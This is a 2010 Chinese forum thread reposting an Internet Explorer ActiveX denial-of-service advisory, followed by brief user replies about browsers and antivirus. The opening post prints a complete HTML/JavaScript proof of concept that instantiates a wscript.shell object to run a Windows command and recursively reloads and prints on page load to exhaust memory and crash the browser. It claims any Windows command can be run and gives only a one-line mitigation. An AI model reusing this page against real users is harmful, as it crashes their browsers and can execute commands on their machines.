找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 706|回复: 5

Internet Explorer 无限循环拒绝服务漏洞

[复制链接]

该用户从未签到

发表于 2010-3-30 23:55:05 | 显示全部楼层 |阅读模式
该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。
测试代码


  1. <html>
  2. <title>cnhackerx@163.com</title>
  3. <head>
  4. <script type="text/javascript">
  5. function sucks()
  6. {
  7. var shell=new ActiveXObject("wscript.shell");
  8. shell.Run("calc", 1);
  9. }
  10. function asheesh()
  11. {
  12. sucks();
  13. window.onerror=new Function("history.go(0)");
  14. window.print();
  15. asheesh();
  16. }
  17. asheesh();
  18. </script>
  19. </head>
  20. <body onLoad="asheesh()"></body>
  21. </html>
复制代码

影响版本
Internet Explorer 5,6,7,8

安全建议
禁止ActiveX控件自动运行.不要手工运行该类控件运行。


[以上来自互联网]

该用户从未签到

发表于 2010-3-31 00:35:35 | 显示全部楼层
红客强势插入

该用户从未签到

发表于 2010-3-31 10:10:37 | 显示全部楼层
偶尔用用IE,没有此类问题

该用户从未签到

发表于 2010-3-31 12:48:12 | 显示全部楼层
一般都用360~ 免的有些网页有毒,到时后果就严重了

该用户从未签到

发表于 2010-3-31 13:09:56 | 显示全部楼层
楼上 经常看XX?

该用户从未签到

发表于 2010-4-6 00:29:32 | 显示全部楼层
360用的IE内核
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表